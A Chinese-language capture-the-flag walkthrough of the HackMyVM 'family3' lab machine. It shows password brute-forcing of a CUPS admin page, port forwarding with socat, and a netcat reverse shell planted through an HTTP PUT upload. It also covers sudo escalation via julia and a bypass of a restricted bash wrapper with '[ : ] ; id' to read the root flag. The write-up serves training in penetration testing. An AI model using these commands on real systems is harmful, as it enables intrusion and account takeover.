HackMyVM-family3靶场WP

信息收集

服务探测

常规arp-scan扫一下靶场ip

┌──(kali㉿kali)-[~/family3]
└─$ sudo arp-scan -l 
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:56:f5:92       PCS Systemtechnik GmbH
192.168.56.110  08:00:27:96:02:e3       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 3 responded

使用nmap所有端口都扫一下

┌──(kali㉿kali)-[~/family3]
└─$ sudo nmap -sS -sV -p- -A 192.168.56.110 -oN .family3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-03 09:19 EDT
Nmap scan report for 192.168.56.110
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
631/tcp open  ipp        CUPS 2.3
|_http-title: Home - CUPS 2.3.3op2
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: CUPS/2.3 IPP/2.1
MAC Address: 08:00:27:96:02:E3 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/3%OT=631%CT=1%CU=35764%PV=Y%DS=1%DC=D%G=Y%M=08002
OS:7%TM=66855021%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=10D%TI=Z%CI=Z%I
OS:I=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW
OS:7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88
OS:%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms 192.168.56.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.35 seconds

发现开放了22端口和631端口，631这个端口好像还开着http服务

我们先用ssh连一下22端口，发现连不上ssh那就尝试在631上找找线索

┌──(kali㉿kali)-[~/family3]
└─$ whatweb 192.168.56.110:631
http://192.168.56.110:631 [200 OK] Content-Language[en], Country[RESERVED][ZZ], HTML5, HTTPServer[CUPS/2.3 IPP/2.1], IP[192.168.56.110], Title[Home - CUPS 2.3.3op2], UncommonHeaders[accept-encoding,content-security-policy], X-Frame-Options[DENY], X-UA-Compatible[IE=9]

发现是个打印机的服务

在administration页面中发现add printer中需要进行登入

其实在此之前可以使用gobuster扫一下目录的

爆破Http服务

那就使用burpsutie爆破一下

从printers页面中得知信息，用户名大概率是mum

burpsuite不知道为啥爆破这么慢，换wfuzz进行枚举

┌──(kali㉿kali)-[~/family3]
└─$ wfuzz -c -w /usr/share/wordlists/rockyou.txt --basic mum:FUZZ -u http://192.168.56.110:631/admin -b "org.cups.sid=a2d6847dfa1a3159baaccf9c56089e18" -d "org.cups.sid=a2d6847dfa1a3159baaccf9c56089e18&OP=add-printer" -Z --hc 401
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.110:631/admin
Total requests: 14344392

=====================================================================
ID           Response   Lines    Word       Chars       Payload                       
=====================================================================

000000015:   200        110 L    296 W      3439 Ch     "lovely"                      
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 38
Filtered Requests: 37
Requests/sec.: 0

拿到mum的密码为lovely，起初常规思路是利用这个打印机页面上传一个webshell再执行其他操作

后续发现不能通过这种操作来进行

SSH连接

登入mum用户

看了下老外的wp我第一次知道可以通过ssh ipv6地址远程连接的

具体操作是先利用ping6 来ping一下组播地址

┌──(kali㉿kali)-[~/family3]
└─$ ping6 ff02::1
PING ff02::1 (ff02::1) 56 data bytes
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=1 ttl=64 time=0.731 ms
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=2 ttl=64 time=0.032 ms
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=3 ttl=64 time=0.032 ms
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=4 ttl=64 time=0.036 ms
^C
--- ff02::1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3056ms
rtt min/avg/max/mdev = 0.032/0.207/0.731/0.302 ms

得到fe80::611e:cbee:c6ef:7352响应包请求

如何得知这个ipv6的地址对应的就是靶机的ip地址呢？

可以使用ip -6 neighbor来查看

不知道为啥我显示空的（靶机重启一下就好了），这里引用老外WP中的图片，后面黄色MAC地址就是arp-acan中查到的靶机ip对应的mac地址

那就直接使用ssh连接一下

看了下dad目录下又两个文件可读可执行

cat了一下project

mum@family:/home/dad$ cat project 
#! /bin/bash

find / -user mum -writable -exec rm {} \; 2>/dev/null
find / -user mum -type f -name -exec grep -il 'password' {} \; 2>/dev/null
find / -user mum -type f -name "id_rsa" 2>/dev/null
find / -user mum -type f -name "authorized_keys" 2>/dev/null
find / -mmin -30 -user mum 2>/dev/null | grep -v "/proc/*"
find /home/dad -type f ! -name "project" -user dad -executable -exec mv "{}" ~/survey \; 
cat /var/mail/mum
cat /home/mum/.bash_history 2>/dev/null
cat /var/spool/cups/d0002*
for file in ~/survey/* ; do [[ -O $file ]] && bash $file 2>/dev/null ; done
strings /dev/mem -n100 | grep -i mum
who -u |grep mum

发现有一行是执行 survey 目录中属于当前用户的脚本：

for file in ~/survey/* ; do [[ -O $file ]] && bash $file 2>/dev/null ; done

遍历 ~/survey 目录中的所有文件，如果文件属于当前用户，则执行这些文件。2>/dev/null 抑制错误信息。

发现有一个index.html文件尝试看一下靶机有没有开放端口

ss -lntp命令参数及其功能说明：该命令将输出所有当前监听的TCP端口，并显示每个端口的详细信息，包括数值形式的IP地址和端口、以及正在监听这些端口的进程信息。

mum@family:/home/dad/survey$ ss -lntp
State      Recv-Q      Send-Q           Local Address:Port           Peer Address:Port     Process     
LISTEN     0           128                    0.0.0.0:22                  0.0.0.0:*                    
LISTEN     0           128                    0.0.0.0:631                 0.0.0.0:*                    
LISTEN     0           5                    127.0.0.1:8000                0.0.0.0:*                    
LISTEN     0           128                       [::]:22                     [::]:*                    
LISTEN     0           128                       [::]:631                    [::]:*                  

通过wget将socat从本机上传到靶机

使用socat将本地8000端口映射到0.0.0.0:8080

./socat TCP-LISTEN:8080,fork TCP4:127.0.0.1:8000 &

浏览器访问8080端口

发现显示的就是dad/survey/ 目录下的index.html

这里没什么提示信息

那就尝试上传一个webshell让project文件执行一下，但是这个/survey文件夹是隶属于dad用户，没权限写入

提权dad用户

后面看了别人的wp，可以使用nikto扫一下

nikto说实话挺老的，基本不用了

┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.56.110 -p 8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.110
+ Target Hostname:    192.168.56.110
+ Target Port:        8080
+ Start Time:         2024-07-06 09:08:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.18
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2).
+ Python/2.7.18 appears to be outdated (current is at least 3.9.6).
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8112 requests: 9 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-07-06 09:09:06 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

发现靶机上生成了nikto的测试文件，而且文件是隶属于dad的

那就猜测可以使用 PUT 请求将文件上传上去

交叉验证一下，写一个循环

使用不同的method查看返回的结果

mum@family:/home/dad/survey$ for x in GET POST PUT HEAD ; do echo "Method: $x" ; curl --head -X $x http://localhost:8000 ; done
Method: GET
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Sat, 06 Jul 2024 13:45:54 GMT
Content-type: text/html
Content-Length: 7031
Last-Modified: Mon, 17 Oct 2022 16:24:46 GMT

Method: POST
HTTP/1.0 501 Unsupported method ('POST')
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Sat, 06 Jul 2024 13:45:54 GMT
Connection: close
Content-Type: text/html

Method: PUT
curl: (52) Empty reply from server
Method: HEAD
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Sat, 06 Jul 2024 13:45:54 GMT
Content-type: text/html
Content-Length: 7031
Last-Modified: Mon, 17 Oct 2022 16:24:46 GMT

果然是可以进行PUT请求的

那就常规利用netcat反弹shell

mum@family:/tmp$ echo "nc -e /bin/bash 192.168.56.102 4444" > rev
mum@family:/tmp$ cat rev 
nc -e /bin/bash 192.168.56.102 4444
mum@family:/tmp$ curl -X PUT -T rev 127.0.0.1:8000
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    36    0     0  100    36      0     35  0:00:01  0:00:01 --:--:--    35
curl: (52) Empty reply from server

执行一下project成功拿到dad的shell

提权baby用户

查看一下sudo权限sudo -l

dad@family:~$ sudo -l
Matching Defaults entries for dad on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dad may run the following commands on family:
    (baby) NOPASSWD: /usr/bin/julia

在Gtfobins查到julia的sudo提权

dad@family:/home$ sudo -u baby /usr/bin/julia -e 'run(`/bin/sh`)' 

拿到baby用户，成功拿到第一个flag

在baby用户下的sudo权限

提权Root

信息收集

b👶by@family:~$ sudo -l
Matching Defaults entries for baby on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family:
    (root) NOPASSWD: /home/baby/chocapic

可以以root权限运行chocapic

先看看chocapic文件然后丢给ChatGPT解释一下

b👶by@family:~$ cat chocapic 
#! /bin/bash
set -e

while :
do
read -ep "baby command: " cmd
[[ ! $cmd =~ ^[[:alnum:]]|^$ ]] && break
done

var=$(echo ${cmd%% *}) 2>/dev/null
[[ ${#var} -ne 1 ]] && exit 1

read -ra line <<< "$cmd"
check=${line[1]} 
[[ $check =~ ^[a-z] ]] && exit 1

if ! type -t "$check" |grep ^b >/dev/null && [[ ! ${#check} -eq 1 ]] ; then exit 1 ; fi

eval "$check" 2>/dev/null
bash -c "$cmd" 

总结

这个脚本通过读取用户输入，确保命令的格式和要求，然后执行命令。主要检查包括：

• 命令是否以字母或数字开头。
• 命令的第一个单词长度是否为 1。
• 命令的第一个参数是否为内建命令或长度为 1。

如果命令通过所有检查，就会在新的 Bash shell 中执行。

尝试直接输入ls发现bash没有执行

下面问了下GPT

为什么 ls 无响应

对于简单的 ls 命令：

1. 读取输入：

   cmd 的值是 ls，符合 [[ $cmd =~ ^[[:alnum:]] ]]，所以进入循环。

2. 变量提取和长度检查：

   bash复制代码var=$(echo ${cmd%% *}) 2>/dev/null
   [[ ${#var} -ne 1 ]] && exit 1

   var 值是 ls，长度为2，不满足 [[ ${#var} -ne 1 ]]，所以脚本退出。

而执行[ : ] ; id 可以返回

分析 [ : ] ; id 为什么有效

1. 读取输入：

   输入 [ : ] ; id 时，cmd 变量的值是 [ : ] ; id。这符合 [[ $cmd =~ ^[[:alnum:]] ]]，因为这个正则表达式只检查字符串是否以字母或数字开头，但输入的命令以空格开头，跳过检查直接退出循环。

2. 变量提取和长度检查：

   bash
   复制代码
   var=$(echo ${cmd%% *}) 2>/dev/null

   提取第一个空格前的内容（即 [），长度为1。

3. 命令解析和检查：

   bash复制代码read -ra line <<< "$cmd"
   check=${line[1]}
   [[ $check =~ ^[a-z] ]] && exit 1

   line 数组解析后，line[1] 的值是 :。这是有效的内建命令，所以 check 不符合 [[ $check =~ ^[a-z] ]] 条件。

4. 类型检查：

   bash
   复制代码
   if ! type -t "$check" | grep ^b >/dev/null && [[ ! ${#check} -eq 1 ]]; then exit 1; fi

   type -t ":" 结果是 builtin，满足条件，因此不会退出。

5. 命令执行：

   bash复制代码eval "$check" 2>/dev/null
   bash -c "$cmd"

   eval ":" 执行 : 内建命令，然后执行 bash -c "[ : ] ; id"，所以会有响应，显示用户信息。

使用chocapic读取了/root/root.txt

b👶by@family:~$ sudo ./chocapic 
baby command: [ : ] ; cat /root/root.txt
Salted__"�1լ���Ȉ�m�:Pi�|q�8FH�yNU:k�.ᛥ�24�}��;E�$/7b👶by@family:~$ 

发现是乱码的，前面有个salted加盐怀疑是加密了之类的

不得已又看了WP，原谅我彩笔

root@family:/home/baby# file /root/root.txt 查看root文件信息
/root/root.txt: openssl enc'd data with salted password
root@family:/home/baby# lsblk 发现密码藏在sda3分区中
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0 15.3G  0 disk 
├─sda1   8:1    0 13.3G  0 part /
├─sda2   8:2    0    1K  0 part 
├─sda3   8:3    0    1G  0 part 
└─sda5   8:5    0  976M  0 part [SWAP]
root@family:/home/baby# mount /dev/sda3 /mnt/ 挂在sda3到mnt上
root@family:/home/baby# cat /mnt/password 看一下password
QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma
root@family:/home/baby# echo  "QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma">/root/pass

openssl解密

问下GPT利用openssl解密一下

示例解释

1. openssl enc -d -aes-256-cbc：选择解密模式，并指定算法 aes-256-cbc。
2. -in encrypted_file.enc：指定要解密的输入文件 encrypted_file.enc。
3. -out decrypted_file.txt：指定解密后的输出文件 decrypted_file.txt。
4. -pass pass:mysecretpassword：使用 mysecretpassword 作为解密密码。

root@family:~# openssl enc -aes128 -pbkdf2 -d -in root.txt -pass pass:QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma
8d8ff4976efccbfc8ff7d7554b9239e5

结束了，后面root解密是真的没想到，太恶心了